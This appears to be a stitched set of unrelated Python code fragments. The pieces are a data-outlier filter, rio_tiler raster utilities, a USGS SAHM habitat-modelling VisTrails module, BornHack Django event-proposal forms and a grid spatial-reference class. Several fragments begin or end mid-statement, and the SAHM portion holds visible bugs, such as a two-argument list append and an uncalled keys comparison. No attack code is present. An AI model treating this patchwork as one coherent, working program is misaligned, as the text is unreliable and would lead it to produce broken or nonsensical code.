outOutlierArray : Array with identyfied rows that are detected as Outliers.
outMaxLim : Calculates the Maximum Value limit
outMinLim : Calculates the Minimum Value limit
msg : success or error massage reason
*****************************************************************************************************************************"""
def stdDev(self, inDataArray, inStdDevFact):
outOutlierArray = [] # initializing array
flag = Filter.success
msg = ''
# providing try block to handle exceptions
try:
# initializing variables
outOPercent = 0
outMaxLim = 0
outMinLim = 0
#catch error that the StdDevFact should be an integer value
if type(inStdDevFact) != int:
msg = Filter.eMsg6 # 'Provide a Integer value '
flag = Filter.error
return flag, outOPercent, outOutlierArray, outMaxLim, outMinLim, msg
# check the range of standard deviation factor
if inStdDevFact > Filter.cStdDevFactMax or inStdDevFact < Filter.cStdDevFactMin:
msg = 'standard deviation factor should be between ' + str(Filter.cStdDevFactMin) + ' and ' + str(
Filter.cStdDevFactMax)
flag = Filter.error
return flag, outOPercent, outOutlierArray, outMaxLim, outMinLim, msg # returing flag(error),0,[],0,0, message
# checking valid length of array
if len(inDataArray) < Filter.cArrayLenLimit:
msg = Filter.eMsg4 # 'Number of input values less than 3'
flag = Filter.error
return flag, outOPercent, outOutlierArray, outMaxLim, outMinLim, msg # returing flag(error),0,[],0,0, message
# calculation with valid length of array
else:
stdDev = np.std(inDataArray, axis=0) #calculated standard deviation
stdMean = np.mean(inDataArray, axis=0) #calculated min
outMaxLim = stdMean + (stdDev * inStdDevFact) # calculated max limit
outMinLim = stdMean - (stdDev * inStdDevFact) #calculated min limit
# calls the maxMin to detect the outliers based on calculated MaxLim and MinLim
flag, outOPercent, outOutlierArray, msg = Filter.maxMin(self, inDataArray, outMaxLim, outMinLim)
# handling exceptions in except block
except:
flag = Filter.error
msg = Filter.eMsg1 # unexpected error
return flag, outOPercent, outOutlierArray, outMaxLim, outMinLim, msg # returing flag(success or error),outlier percentage,outlier index,max limit,min limit, message
"""
*****************************************************************************************************************************
method movingAvg : This calculate the moving average for the data to move forward,backward or fixed by the number of windows
determined by the trader or the user
parameters:
inDataArray : input array provided to smooth data
inWindow : window to calculate moving average
inMavgType : type of moving average.default avgType = bakward
the values can be either of these three values according to user.
1.forward
2.bakward
3.fixed
variables:
values : array to capture intermediate values after convolution
weights : array calulated with numpy Repeat method anf geting output of size window and value 1.0/window
revArray : intermediate array to calcuate final array
inputArrayLen : number of input
| |
"""rio_tiler.utils: utility functions."""
import os
from io import BytesIO
from typing import Any, Dict, Generator, Optional, Sequence, Tuple, Union
import numpy
from affine import Affine
from boto3.session import Session as boto3_session
from rasterio import windows
from rasterio.crs import CRS
from rasterio.enums import ColorInterp, MaskFlags
from rasterio.features import is_valid_geom
from rasterio.io import DatasetReader, DatasetWriter, MemoryFile
from rasterio.rio.helpers import coords
from rasterio.transform import from_bounds, rowcol
from rasterio.vrt import WarpedVRT
from rasterio.warp import calculate_default_transform, transform_geom
from .colormap import apply_cmap
from .constants import WEB_MERCATOR_CRS, BBox, NumType
from .errors import RioTilerError
def _chunks(my_list: Sequence, chuck_size: int) -> Generator[Sequence, None, None]:
"""Yield successive n-sized chunks from l."""
for i in range(0, len(my_list), chuck_size):
yield my_list[i : i + chuck_size]
def aws_get_object(
bucket: str,
key: str,
request_pays: bool = False,
client: boto3_session.client = None,
) -> bytes:
"""AWS s3 get object content."""
if not client:
session = boto3_session()
endpoint_url = os.environ.get("AWS_S3_ENDPOINT", None)
client = session.client("s3", endpoint_url=endpoint_url)
params = {"Bucket": bucket, "Key": key}
if request_pays:
params["RequestPayer"] = "requester"
response = client.get_object(**params)
return response["Body"].read()
def _stats(
arr: numpy.ma.array, percentiles: Tuple[float, float] = (2, 98), **kwargs: Any
) -> Dict:
"""Calculate array statistics.
Args:
arr (numpy.ndarray): Input array data to get the stats from.
percentiles (tuple, optional): Min/Max percentiles to compute. Defaults to `(2, 98)`.
kwargs (optional): Options to forward to numpy.histogram function.
Returns:
dict: numpy array statistics (percentiles, min, max, stdev, histogram, valid_percent).
Examples:
>>> {
'percentiles': [38, 147],
'min': 20,
'max': 180,
'std': 28.123562304138662,
'histogram': [
[1625, 219241, 28344, 15808, 12325, 10687, 8535, 7348, 4656, 1208],
[20.0, 36.0, 52.0, 68.0, 84.0, 100.0, 116.0, 132.0, 148.0, 164.0, 180.0]
],
'valid_percent': 0.5
}
"""
sample, edges = numpy.histogram(arr[~arr.mask], **kwargs)
return dict(
percentiles=numpy.percentile(arr[~arr.mask], percentiles)
.astype(arr.dtype)
.tolist(),
min=arr.min().item(),
max=arr.max().item(),
std=arr.std().item(),
histogram=[sample.tolist(), edges.tolist()],
valid_percent=numpy.count_nonzero(~arr.mask) / float(arr.data.size),
)
# https://github.com/OSGeo/gdal/blob/b1c9c12ad373e40b955162b45d704070d4ebf7b0/gdal/frmts/ingr/IngrTypes.cpp#L191
def _div_round_up(a: int, b: int) -> int:
return (a // b) if (a % b) == 0 else (a // b) + 1
def get_overview_level(
src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT],
bounds: BBox,
height: int,
width: int,
dst_crs: CRS = WEB_MERCATOR_CRS,
) -> int:
"""Return the overview level corresponding to the tile resolution.
Freely adapted from https://github.com/OSGeo/gdal/blob/41993f127e6e1669fbd9e944744b7c9b2bd6c400/gdal/apps/gdalwarp_lib.cpp#L2293-L2362
Args:
src_dst (rasterio.io.DatasetReader or rasterio.io.DatasetWriter or rasterio.vrt.WarpedVRT): Rasterio dataset.
bounds (tuple): Bounding box coordinates in target crs (**dst_crs**).
height (int): Desired output height of the array for the input bounds.
width (int): Desired output width of the array for the input bounds.
dst_crs (rasterio.crs.CRS, optional): Target Coordinate Reference System. Defaults to `epsg:3857`.
Returns:
int: Overview level.
"""
dst_transform, _, _ = calculate_default_transform(
src_dst.crs, dst_crs, src_dst.width, src_dst.height, *src_dst.bounds
)
src_res = dst_transform.a
# Compute what the "natural" output resolution
# (in pixels) would be for this input dataset
vrt_transform = from_bounds(*bounds, width, height)
target_res = vrt_transform.a
ovr_idx = -1
if target_res > src_res:
res = [src_res * decim for decim in src_dst.overviews(1)]
for ovr_idx in range(ovr_idx, len(res) - 1):
ovrRes = src_res if ovr_idx < 0 else res[ovr_idx]
nextRes = res[ovr_idx + 1]
if (ovrRes < target_res) and (nextRes > target_res):
break
if abs(ovrRes - target_res) < 1e-1:
break
else:
ovr_idx = len(res) - 1
return ovr_idx
def get_vrt_transform(
src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT],
bounds: BBox,
height: Optional[int] = None,
width: Optional[int] = None,
dst_crs: CRS = WEB_MERCATOR_CRS,
window_precision: int = 6,
) -> Tuple[Affine, int, int]:
"""Calculate VRT transform.
Args:
src_dst (rasterio.io.DatasetReader or rasterio.io.DatasetWriter or rasterio.vrt.WarpedVRT): Rasterio dataset.
bounds (tuple): Bounding box coordinates in target crs (**dst_crs**).
height (int, optional): Desired output height of the array for the input bounds.
width (int, optional): Desired output width of the array for the input bounds.
dst_crs (rasterio.crs.CRS, optional): Target Coordinate Reference System. Defaults to `epsg:3857`.
Returns:
tuple: VRT transform (affine.Affine), width (int) and height (int)
"""
dst_transform, _, _ = calculate_default_transform(
src_dst.crs, dst_crs, src_dst.width, src_dst.height, *src_dst.bounds
)
# If bounds window is aligned with the dataset internal tile we align the bounds with the pixels.
# This is to limit the number of internal block fetched.
if _requested_tile_aligned_with_internal_tile(
src_dst, bounds, height, width, dst_crs
):
col_off, row_off, w, h = windows.from_bounds(
*bounds, transform=src_dst.transform, width=width, height=height,
).flatten()
w = windows.Window(
round(col_off, window_precision),
round(row_off, window_precision),
round(w, window_precision),
round(h, window_precision),
)
bounds = src_dst.window_bounds(w)
w, s, e, n = bounds
# TODO: Explain
if not height or not width:
vrt_width = max(1, round((e - w) / dst_transform.a))
vrt_height = max(1, round((s - n) / dst_transform.e))
vrt_transform = from_bounds(w, s, e, n, vrt_width, vrt_height)
return vrt_transform, vrt_width, vrt_height
# TODO: Explain
tile_transform = from_bounds(w, s, e, n, width, height)
w_res = (
tile_transform.a
if abs(tile_transform.a) < abs(dst_transform.a)
else dst_transform.a
)
h_res = (
tile_transform.e
if abs(tile_transform.e) < abs(dst_transform.e)
else dst_transform.e
)
# TODO: Explain
vrt_width = max(1, round((e - w) / w_res))
vrt_height = max(1, round((s - n) / h_res))
vrt_transform = from_bounds(w, s, e, n, vrt_width, vrt_height)
return vrt_transform, vrt_width, vrt_height
def has_alpha_band(src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT]) -> bool:
"""Check for alpha band or mask in source."""
if (
any([MaskFlags.alpha in flags for flags in src_dst.mask_flag_enums])
or ColorInterp.alpha in src_dst.colorinterp
):
return True
return False
def has_mask_band(src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT]) -> bool:
"""Check for mask band in source."""
if any(
[
(MaskFlags.per_dataset in flags and MaskFlags.alpha not in flags)
for flags in src_dst.mask_flag_enums
]
):
return True
return False
def non_alpha_indexes(src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT]) -> Tuple:
"""Return indexes of non-alpha bands."""
return tuple(
b
for ix, b in enumerate(src_dst.indexes)
if (
src_dst.mask_flag_enums[ix] is not MaskFlags.alpha
and src_dst.colorinterp[ix] is not ColorInterp.alpha
)
)
def linear_rescale(
image: numpy.ndarray,
in_range: Tuple[NumType, NumType],
out_range: Tuple[NumType, NumType] = (0, 255),
) -> numpy.ndarray:
"""Apply linear rescaling to a numpy array.
Args:
image (numpy.ndarray): array to rescale.
in_range (tuple): array min/max value to rescale from.
out_range (tuple, optional): output min/max bounds to rescale to. Defaults to `(0, 255)`.
Returns:
numpy.ndarray: linear rescaled array.
"""
imin, imax = in_range
omin, omax = out_range
image = numpy.clip(image, imin, imax) - imin
image = image / numpy.float64(imax - imin)
return image * (omax - omin) + omin
def _requested_tile_aligned_with_internal_tile(
src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT],
bounds: BBox,
height: Optional[int] = None,
width: Optional[int] = None,
bounds_crs: CRS = WEB_MERCATOR_CRS,
) -> bool:
"""Check if tile is aligned with internal tiles."""
if not src_dst.is_tiled:
return False
if src_dst.crs != bounds_crs:
return False
col_off, row_off, w, h = windows.from_bounds(
*bounds, transform=src_dst.transform, height=height, width=width
).flatten()
if round(w) % 64 and round(h) % 64:
return False
if (src_dst.width - round(col_off)) % 64:
return False
if (src_dst.height - round(row_off)) % 64:
return False
return True
def render(
data: numpy.ndarray,
mask: Optional[numpy.ndarray] = None,
img_format: str = "PNG",
colormap: Optional[Dict] = None,
**creation_options: Any,
) -> bytes:
"""Translate numpy.ndarray to image bytes.
Args:
data (numpy.ndarray): Image array to encode.
mask (numpy.ndarray, optional): Mask array.
img_format (str, optional): Image format. See: for the list of supported format by GDAL: https://www.gdal.org/formats_list.html. Defaults to `PNG`.
colormap (dict, optional): GDAL RGBA Color Table dictionary.
creation_options (optional): Image driver creation options to forward to GDAL.
Returns
bytes: image body.
Examples:
>>> with COGReader("my_tif.tif") as cog:
img = cog.preview()
with open('test.jpg', 'wb') as f:
f.write(render(img.data, img.mask, img_format="jpeg"))
"""
img_format = img_format.upper()
if len(data.shape) < 3:
data = numpy.expand_dims(data, axis=0)
if colormap:
data, alpha = apply_cmap(data, colormap)
if mask is not None:
mask = (
mask * alpha * 255
) # This is a special case when we want to mask some valid data
# WEBP doesn't support 1band dataset so we must hack to create a RGB dataset
if img_format == "WEBP" and data.shape[0] == 1:
data = numpy.repeat(data, 3, axis=0)
elif img_format == "JPEG":
mask = None
elif img_format == "NPY":
# If mask is not None we add it as the last band
if mask is not None:
mask = numpy.expand_dims(mask, axis=0)
data = numpy.concatenate((data, mask))
bio = BytesIO()
numpy.save(bio, data)
bio.seek(0)
return bio.getvalue()
elif img_format == "NPZ":
bio = BytesIO()
if mask is not None:
numpy.savez_compressed(bio, data=data, mask=mask)
else:
numpy.savez_compressed(bio, data=data)
bio.seek(0)
return bio.getvalue()
count, height, width = data.shape
output_profile = dict(
driver=img_format,
dtype=data.dtype,
count=count + 1 if mask is not None else count,
height=height,
width=width,
)
output_profile.update(creation_options)
with MemoryFile() as memfile:
with memfile.open(**output_profile) as dst:
dst.write(data, indexes=list(range(1, count + 1)))
# Use Mask | |
"projection target") most often contains the same environmental
predictors but represents data captured at a different temporal or spatial location. For
example, a user could generate a model predicting habitat suitability using recorded
presence points and certain environmental predictors such as elevation, landcover, and
proximity to water in one geographic location. Based on the training from this information,
the modeled results could be generated for (or "projected to") a new location based on the
range of values seen in elevation, landcover, and proximity to water in the second geographic
area. Similarly, modeling predicted results through time is also possible. A model trained
using field data and a set of predictor layers representative of one time period could be
projected onto the same geographical area using a new set of predictor layers corresponding
to the same predictors but representing data from a different time period (e.g., different
climate data).
The output of this module is subsequently used as the projection target in the ApplyModel module.
(As part of the process of preparing the layers for modeling, the ProjectionLayers module runs
the PARC module internally on the inputs. Outputs from the ProjectionLayers module will possess
matching coordinate systems, cell sizes, and extents and do not need to be run through PARC
before being used downstream in the workflow.)
Six parameters can be set by the user:
1. Directory Crosswalk CSV: This is a .csv file containing two columns designating
the layers that should be swapped out in the projected model. The first column
contains a list of the full paths to the predictor layers used to develop the original
model that will be replaced in the projection process. The second column contains the
full paths to the new predictor layers that will substitute the respective layers used
in the original model. Each original layer in the first column should be paired with
its replacement in the second column (e.g., Column 1 = C:\ModelLayers\Precipitation1980.tif,
Column 2 = C:\ModelLayers\Precipitation2000.tif). In the case of any file used to develop
the first model that is not expressly listed in the Directory Crosswalk CSV with a
replacement, the original file will be used in the new model projection. The module
anticipates a header row in this .csv file (thus, the first row of data will be ignored).
2. File List CSV: This is a .csv file containing the list of predictor files used to
develop the first model. Effectively, this file will be updated based on the information
provided in the directory crosswalk .csv and used as the input to the training process
for the projected model. The output of the PARC module from the first model iteration
should be used as the input to this parameter.
3. Model (available only to users at the FORT): This parameter allows VisTrail users
running the SAHM package on site at the USGS Science Center in Fort Collins (FORT) to
specify one of three models to use for the projected model run ("CCCMA," "CSIRO,"
or "hadcm3").
4. Scenario (available only to users at the FORT): This parameter allows VisTrail
users running the SAHM package on site at the USGS Science Center in Fort Collins
FORT) to specify one of two scenarios for the projected model run ("A2a" or "B2b").
5. Template: This parameter allows a user to specify the new template layer to be used
in the projected model run. The template layer is a raster data layer with a defined
coordinate system, a known cell size, and an extent that defines the (new) study area.
This raster layer serves as the template for all the other inputs in the analysis. All
additional raster layers used in the analysis will be resampled and reprojected as
needed to match the template, snapped to the template, and clipped to have an extent
that matches the template. Users should ensure that all the layers used for the projected
analysis have coverage within the extent of the template layer.
6. Year (available only to users at the FORT): This parameter allows VisTrail users
running the SAHM package on site at the USGS Science Center in Fort Collins (FORT)
to specify one of three years to use for the projected model run ("2020," "2050," or "2080").
'''
_input_ports = [('RastersWithPARCInfoCSV', '(gov.usgs.sahm:RastersWithPARCInfoCSV:Other)'),
('templateLayer', '(gov.usgs.sahm:TemplateLayer:DataInput)'),
('model', '(edu.utah.sci.vistrails.basic:String)'),
('scenario', '(edu.utah.sci.vistrails.basic:String)'),
('year', '(edu.utah.sci.vistrails.basic:String)'),
('directoryCrosswalkCSV', '(edu.utah.sci.vistrails.basic:File)')
]
_output_ports = [("MDS", "(gov.usgs.sahm:MergedDataSet:Other)")]
def compute(self):
models = ['CCCMA', 'CSIRO', 'hadcm3']
scenarioss = ['A2a', 'B2b']
years = ['2020', '2050', '2080']
writetolog("\nRunning make Projection Layers", True)
inputCSV = self.force_get_input('RastersWithPARCInfoCSV').name
if self.has_input('templateLayer'):
template = self.force_get_input('templateLayer').name
else:
template = '' #we'll get a template below
fromto = []
climargs = {}
for input in ['model', 'scenario', 'year']:
if self.has_input(input):
climargs[input] = self.force_get_input(input)
if climargs <> {} and climargs.keys() <> ['model', 'scenario', 'year']:
#they did not add in one of each, Not going to fly
raise ModuleError(self, "All of model, scenario, and year must be supplied if any are used.")
elif climargs <> {} and climargs.keys <> ['model', 'scenario', 'year']:
#they specified a alt climate scenario add this to our list to search for
fromto.append([r'K:\GIS_LIBRARY\Climate\WorldClim\BioclimaticVariables\bio_30s_esri\bio',
os.path.join('I:\WorldClim_Future_Climate\RenamedBILs',
climargs['model'], climargs['scenario'], climargs['year'])])
if self.has_input('directoryCrosswalkCSV'):
crosswalkCSV = csv.reader(open(self.force_get_input('directoryCrosswalkCSV'), 'r'))
header = crosswalkCSV
for row in crosswalkCSV:
fromto.append(row[0], row[1])
del crosswalkCSV
#write out the outputs to an empty MDS file (just the header is needed to PARC the outputs)
inCSV = csv.reader(open(inputCSV, 'r'))
inCSV.next() #skip header
workingCSV = utils.mknextfile(prefix='tmpFilesToPARC_', suffix='.csv')
tmpCSV = csv.writer(open(workingCSV, 'wb'))
tmpCSV.writerow(["FilePath", "Categorical", "Resampling", "Aggregation"])
outHeader1 = ['x', 'y', 'response']
outHeader2 = ['', '', '']
outHeader3 = ['', '', '']
output_dname = utils.mknextdir(prefix='ProjectionLayers_')
for row in inCSV:
if template == '':
template = row[0]
fileShortName = utils.getShortName(row[0])
if row[1] == 1:
outHeader1.append(fileShortName + '_categorical')
else:
outHeader1.append(fileShortName)
outHeader2.append('1')
outHeader3.append(os.path.join(output_dname, fileShortName + '.tif'))
origFile = row[4]
newOrigFile = origFile
for lookup in fromto:
if lookup[0] in origFile:
newOrigFile = origFile.replace(lookup[0], lookup[1])
tmpCSV.writerow([newOrigFile,] + row[1:4])
del tmpCSV
#PARC the files here
ourPARC = parc.PARC()
if configuration.verbose:
ourPARC.verbose = True
writetolog(" output_dname=" + output_dname, False, False)
ourPARC.outDir = output_dname
ourPARC.inputsCSV = workingCSV
ourPARC.template = template
try:
ourPARC.parcFiles()
except TrappedError as e:
raise ModuleError(self, e.message)
except :
utils.informative_untrapped_error(self, "PARC")
#loop through our workingCSV and format it into an MDS header
#outputMDS = utils.mknextfile(prefix='ProjectionLayersMDS_', suffix = '.csv')
outputMDS = os.path.join(output_dname, 'ProjectionLayersMDS.csv')
outCSV = csv.writer(open(outputMDS, 'wb'))
outCSV.writerow(outHeader1)
outCSV.writerow(outHeader2)
outCSV.writerow(outHeader3)
output_file = utils.create_file_module(outputMDS)
self.set_output("MDS", output_file)
writetolog("Finished Select Projection Layers widget", True)
#class ClimateModel(String):
# _input_ports = [('value', '(gov.usgs.sahm:ClimateModel:Other)')]
# _output_ports = [('value_as_string', '(edu.utah.sci.vistrails.basic:String)', True)]
# _widget_class = build_enum_widget('ClimateModel',
# ['CCCMA', 'CSIRO', 'hadcm3'])
#
# @staticmethod
# def get_widget_class():
# return ClimateModel._widget_class
#
#class ClimateScenario(String):
# _input_ports = [('value', '(gov.usgs.sahm:ClimateScenario:Other)')]
# _output_ports = [('value_as_string', '(edu.utah.sci.vistrails.basic:String)', True)]
# _widget_class = build_enum_widget('ClimateScenario',
# ['A2a', 'B2b'])
#
# @staticmethod
# def get_widget_class():
# return ClimateScenario._widget_class
#
#class ClimateYear(String):
# _input_ports = [('value', '(gov.usgs.sahm:ClimateYear:Other)')]
# _output_ports = [('value_as_string', '(edu.utah.sci.vistrails.basic:String)', True)]
# _widget_class = build_enum_widget('ClimateYear',
# ['2020', '2050', '2080'])
#
# @staticmethod
# def get_widget_class():
# return ClimateYear._widget_class
class MAXENT(Module):
_output_ports = [("lambdas", "(edu.utah.sci.vistrails.basic:File)"),
("report", "(edu.utah.sci.vistrails.basic:File)"),
("roc", "(edu.utah.sci.vistrails.basic:File)")]
def compute(self):
global maxent_path
ourMaxent = MaxentRunner.MAXENTRunner()
ourMaxent.outputDir = utils.mknextdir(prefix='maxentFiles_')
ourMaxent.inputMDS = self.force_get_input('inputMDS').name
ourMaxent.maxentpath = maxent_path
MaxentArgsCSV = utils.mknextfile(prefix='MaxentArgs', suffix='.csv')
argWriter = csv.writer(open(MaxentArgsCSV, 'wb'))
argWriter.writerow(['parameter','value'])
for port in self._input_ports:
#print port
if port[0] <> 'inputMDS' and port[0] <> 'projectionlayers':
if self.has_input(port[0]):
port_val = self.get_input(port[0])
if port[1] == "(edu.utah.sci.vistrails.basic:Boolean)":
port_val = str(port_val).lower()
elif (port[1] == "(edu.utah.sci.vistrails.basic:Path)" or \
port[1] == "(edu.utah.sci.vistrails.basic:File)"):
port_val = port_val.name
argWriter.writerow([port[0], port_val])
else:
#print " has no input "
kwargs = port[2]
#print kwargs
try:
if port[1] == "(edu.utah.sci.vistrails.basic:Boolean)":
default = kwargs['defaults'][2:-2].lower()
else:
default = kwargs['defaults'][2:-2]
#args[port[0]] = default
argWriter.writerow([port[0], default])
except KeyError:
pass
if self.has_input('projectionlayers'):
value = self.force_get_input_list('projectionlayers')
projlayers = ','.join([path.name for path in value])
argWriter.writerow(['projectionlayers', projlayers])
del argWriter
ourMaxent.argsCSV = MaxentArgsCSV
ourMaxent.logger = utils.getLogger()
try:
ourMaxent.run()
except TrappedError as e:
raise ModuleError(self, e.message)
except:
utils.informative_untrapped_error(self, | |
import logging
from django import forms
from django.core.exceptions import ImproperlyConfigured
from .models import Event, EventProposal, EventTrack, SpeakerProposal
logger = logging.getLogger("bornhack.%s" % __name__)
class SpeakerProposalForm(forms.ModelForm):
"""
The SpeakerProposalForm. Takes a list of EventTypes in __init__,
and changes fields accordingly if the list has 1 element.
"""
class Meta:
model = SpeakerProposal
fields = [
"name",
"email",
"biography",
"needs_oneday_ticket",
"submission_notes",
"event_conflicts",
]
def __init__(self, camp, event_type=None, matrix={}, *args, **kwargs):
"""
initialise the form and adapt based on event_type
"""
super().__init__(*args, **kwargs)
# only show events from this camp
self.fields["event_conflicts"].queryset = Event.objects.filter(
track__camp=camp,
event_type__support_speaker_event_conflicts=True,
)
if matrix:
# add speaker availability fields
for date in matrix.keys():
# do we need a column for this day?
if matrix[date]:
# loop over the daychunks for this day
for daychunk in matrix[date]:
if matrix[date][daychunk]:
# add the field
self.fields[
matrix[date][daychunk]["fieldname"]
] = forms.BooleanField(required=False)
# add it to Meta.fields too
self.Meta.fields.append(matrix[date][daychunk]["fieldname"])
# adapt form based on EventType?
if not event_type:
# we have no event_type to customize the form, use the default form
return
if event_type.name == "Debate":
# fix label and help_text for the name field
self.fields["name"].label = "Guest Name"
self.fields[
"name"
].help_text = "The name of a debate guest. Can be a real name or an alias."
# fix label and help_text for the email field
self.fields["email"].label = "Guest Email"
self.fields[
"email"
].help_text = "The email for this guest. Will default to the logged-in users email if left empty."
# fix label and help_text for the biograpy field
self.fields["biography"].label = "Guest Biography"
self.fields["biography"].help_text = "The biography of the guest."
# fix label and help_text for the submission_notes field
self.fields["submission_notes"].label = "Guest Notes"
self.fields[
"submission_notes"
].help_text = "Private notes regarding this guest. Only visible to yourself and the BornHack organisers."
# no free tickets for debates
del self.fields["needs_oneday_ticket"]
elif event_type.name == "Lightning Talk":
# fix label and help_text for the name field
self.fields["name"].label = "Speaker Name"
self.fields[
"name"
].help_text = "The name of the speaker. Can be a real name or an alias."
# fix label and help_text for the email field
self.fields["email"].label = "Speaker Email"
self.fields[
"email"
].help_text = "The email for this speaker. Will default to the logged-in users email if left empty."
# fix label and help_text for the biograpy field
self.fields["biography"].label = "Speaker Biography"
self.fields["biography"].help_text = "The biography of the speaker."
# fix label and help_text for the submission_notes field
self.fields["submission_notes"].label = "Speaker Notes"
self.fields[
"submission_notes"
].help_text = "Private notes regarding this speaker. Only visible to yourself and the BornHack organisers."
# no free tickets for lightning talks
del self.fields["needs_oneday_ticket"]
elif event_type.name == "Music Act":
# fix label and help_text for the name field
self.fields["name"].label = "Artist Name"
self.fields[
"name"
].help_text = "The name of the artist. Can be a real name or artist alias."
# fix label and help_text for the email field
self.fields["email"].label = "Artist Email"
self.fields[
"email"
].help_text = "The email for this artist. Will default to the logged-in users email if left empty."
# fix label and help_text for the biograpy field
self.fields["biography"].label = "Artist Description"
self.fields["biography"].help_text = "The description of the artist."
# fix label and help_text for the submission_notes field
self.fields["submission_notes"].label = "Artist Notes"
self.fields[
"submission_notes"
].help_text = "Private notes regarding this artist. Only visible to yourself and the BornHack organisers."
# no oneday tickets for music acts
del self.fields["needs_oneday_ticket"]
elif event_type.name == "Talk" or event_type.name == "Keynote":
# fix label and help_text for the name field
self.fields["name"].label = "Speaker Name"
self.fields[
"name"
].help_text = "The name of the speaker. Can be a real name or an alias."
# fix label and help_text for the email field
self.fields["email"].label = "Speaker Email"
self.fields[
"email"
].help_text = "The email for this speaker. Will default to the logged-in users email if left empty."
# fix label and help_text for the biograpy field
self.fields["biography"].label = "Speaker Biography"
self.fields["biography"].help_text = "The biography of the speaker."
# fix label and help_text for the submission_notes field
self.fields["submission_notes"].label = "Speaker Notes"
self.fields[
"submission_notes"
].help_text = "Private notes regarding this speaker. Only visible to yourself and the BornHack organisers."
elif event_type.name == "Workshop":
# fix label and help_text for the name field
self.fields["name"].label = "Host Name"
self.fields[
"name"
].help_text = (
"The name of the workshop host. Can be a real name or an alias."
)
# fix label and help_text for the email field
self.fields["email"].label = "Host Email"
self.fields[
"email"
].help_text = "The email for the host. Will default to the logged-in users email if left empty."
# fix label and help_text for the biograpy field
self.fields["biography"].label = "Host Biography"
self.fields["biography"].help_text = "The biography of the host."
# fix label and help_text for the submission_notes field
self.fields["submission_notes"].label = "Host Notes"
self.fields[
"submission_notes"
].help_text = "Private notes regarding this host. Only visible to yourself and the BornHack organisers."
# no free tickets for workshops
del self.fields["needs_oneday_ticket"]
elif event_type.name == "Recreational Event":
# fix label and help_text for the name field
self.fields["name"].label = "Host Name"
self.fields["name"].help_text = "Can be a real name or an alias."
# fix label and help_text for the email field
self.fields["email"].label = "Host Email"
self.fields[
"email"
].help_text = "The email for the host. Will default to the logged-in users email if left empty."
# fix label and help_text for the biograpy field
self.fields["biography"].label = "Host Biography"
self.fields["biography"].help_text = "The biography of the host."
# fix label and help_text for the submission_notes field
self.fields["submission_notes"].label = "Host Notes"
self.fields[
"submission_notes"
].help_text = "Private notes regarding this host. Only visible to yourself and the BornHack organisers."
# no free tickets for recreational events
del self.fields["needs_oneday_ticket"]
elif event_type.name == "Meetup":
# fix label and help_text for the name field
self.fields["name"].label = "Host Name"
self.fields[
"name"
].help_text = "The name of the meetup host. Can be a real name or an alias."
# fix label and help_text for the email field
self.fields["email"].label = "Host Email"
self.fields[
"email"
].help_text = "The email for the host. Will default to the logged-in users email if left empty."
# fix label and help_text for the biograpy field
self.fields["biography"].label = "Host Biography"
self.fields["biography"].help_text = "The biography of the host."
# fix label and help_text for the submission_notes field
self.fields["submission_notes"].label = "Host Notes"
self.fields[
"submission_notes"
].help_text = "Private notes regarding this host. Only visible to yourself and the BornHack organisers."
# no free tickets for meetups
del self.fields["needs_oneday_ticket"]
else:
raise ImproperlyConfigured(
f"Unsupported event type '{event_type.name}', don't know which form class to use"
)
class EventProposalForm(forms.ModelForm):
"""
The EventProposalForm. Takes an EventType in __init__ and changes fields accordingly.
"""
slides_url = forms.URLField(
label="Slides URL", help_text="Add a URL to your slides.", required=False
)
class Meta:
model = EventProposal
fields = [
"title",
"abstract",
"allow_video_recording",
"duration",
"tags",
"slides_url",
"submission_notes",
"track",
"use_provided_speaker_laptop",
]
def clean_duration(self):
"""Make sure duration has been specified, and make sure it is not too long"""
if not self.cleaned_data["duration"]:
raise forms.ValidationError("Please specify a duration.")
if (
self.event_type.event_duration_minutes
and self.cleaned_data["duration"] > self.event_type.event_duration_minutes
):
raise forms.ValidationError(
f"Please keep duration under {self.event_type.event_duration_minutes} minutes."
)
return self.cleaned_data["duration"]
def clean_track(self):
track = self.cleaned_data["track"]
# TODO: make sure the track is part of the current camp, needs camp as form kwarg to verify
return track
def __init__(self, camp, event_type=None, matrix=None, *args, **kwargs):
# initialise form
super().__init__(*args, **kwargs)
# we need event_type for cleaning later
self.event_type = event_type
TALK = "Talk"
LIGHTNING_TALK = "Lightning Talk"
DEBATE = "Debate"
MUSIC_ACT = "Music Act"
RECREATIONAL_EVENT = "Recreational Event"
WORKSHOP = "Workshop"
MEETUP = "Meetup"
# disable the empty_label for the track select box
self.fields["track"].empty_label = None
self.fields["track"].queryset = EventTrack.objects.filter(camp=camp)
# make sure video_recording checkbox defaults to checked
self.fields["allow_video_recording"].initial = True
if event_type.name not in [TALK, LIGHTNING_TALK]:
# Only talk or lightning talk should show the slides_url field
del self.fields["slides_url"]
# better placeholder text for duration field
self.fields["duration"].label = f"{event_type.name} Duration"
if event_type.event_duration_minutes:
self.fields[
"duration"
].help_text = f"Please enter the duration of this {event_type.name} (in minutes, max {event_type.event_duration_minutes})"
self.fields["duration"].widget.attrs[
"placeholder"
| |
in [delr, delc]:
if isinstance(delrc, float) or isinstance(delrc, int):
msg = (
"delr and delcs must be an array or sequences equal in "
"length to the number of rows/columns."
)
raise TypeError(msg)
self.delc = np.atleast_1d(np.array(delc)).astype(
np.float64
) # * length_multiplier
self.delr = np.atleast_1d(np.array(delr)).astype(
np.float64
) # * length_multiplier
if self.delr.sum() == 0 or self.delc.sum() == 0:
if xll is None or yll is None:
msg = (
"Warning: no grid spacing. "
"Lower-left corner offset calculation methods requires "
"arguments for delr and delc. Origin will be set to "
"upper-left"
)
warnings.warn(msg, PyemuWarning)
xll, yll = None, None
# xul, yul = None, None
self._lenuni = lenuni
self._proj4_str = proj4_str
#
self._epsg = epsg
# if epsg is not None:
# self._proj4_str = getproj4(self._epsg)
# self.prj = prj
# self._wkt = None
# self.crs = CRS(prj=prj, epsg=epsg)
self.supported_units = ["feet", "meters"]
self._units = units
self._length_multiplier = length_multiplier
self._reset()
self.set_spatialreference(xul, yul, xll, yll, rotation)
@property
def xll(self):
if self.origin_loc == "ll":
xll = self._xll if self._xll is not None else 0.0
elif self.origin_loc == "ul":
# calculate coords for lower left corner
xll = self._xul - (
np.sin(self.theta) * self.yedge[0] * self.length_multiplier
)
return xll
@property
def yll(self):
if self.origin_loc == "ll":
yll = self._yll if self._yll is not None else 0.0
